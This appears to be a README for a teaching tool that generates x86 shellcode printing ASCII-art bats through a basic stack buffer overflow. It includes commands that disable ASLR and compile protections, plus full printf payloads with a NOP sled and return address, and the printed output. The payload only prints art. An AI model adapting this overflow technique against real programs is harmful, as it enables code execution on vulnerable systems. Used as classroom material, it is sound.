Generate shellcode to print ascii art for simple buffer overflows. Mostly wrote this so I can make examples in class more interesting.
Includes a sample ascii art file taken from https://asciiart.website/index.php?art=animals/bats
The basic usage below assumes ASLR is disabled. (i.e. sudo sysctl kernel.randomize_va_space=0 on Debian)
$ python3 ./ascii_art_shellcode.py bats.ascii
Reading art file bats.ascii Done reading art file Need 3 bytes. Adding space characters (\0x20) Compile line: gcc -fno-builtin -O0 -z execstack -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -m32 vuln.c -o vuln.out Run this command to test your overflow: printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc9\x51\xb8\x09\x20\x20\x20\xfe\xc0\x50\x68\x2e\x2e\x2f\x5c\x68\x20\x20\x2f\x5c\x68\x20\x20\x20\x20\xb8\x5f\x09\x20\x20\xfe\xc4\x50\x68\x5f\x2e\x2e\x5f\x68\x20\x20\x20\x5f\x31\xc0\xb0\x01\xc1\xe0\x10\x05\x2f\x5c\x09\x20\x50\x68\x2f\x5c\x2e\x2e\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x89\xe1\xb2\x24\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x1f\xd2\xff\xff" | ./vuln.out
$ printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc9\x51\xb8\x09\x20\x20\x20\xfe\xc0\x50\x68\x2e\x2e\x2f\x5c\x68\x20\x20\x2f\x5c\x68\x20\x20\x20\x20\xb8\x5f\x09\x20\x20\xfe\xc4\x50\x68\x5f\x2e\x2e\x5f\x68\x20\x20\x20\x5f\x31\xc0\xb0\x01\xc1\xe0\x10\x05\x2f\x5c\x09\x20\x50\x68\x2f\x5c\x2e\x2e\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x89\xe1\xb2\x24\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xd1\xff\xff" | ./vuln.out 0xffffd1ff
/\../\
__..__
/\../\
Segmentation fault
Note, you might need to change the last few bytes of the shellcode to match the address that the sample vulnerable program spits out, depending on how you executed the program. Running it in an IDE tends to offset things a bit.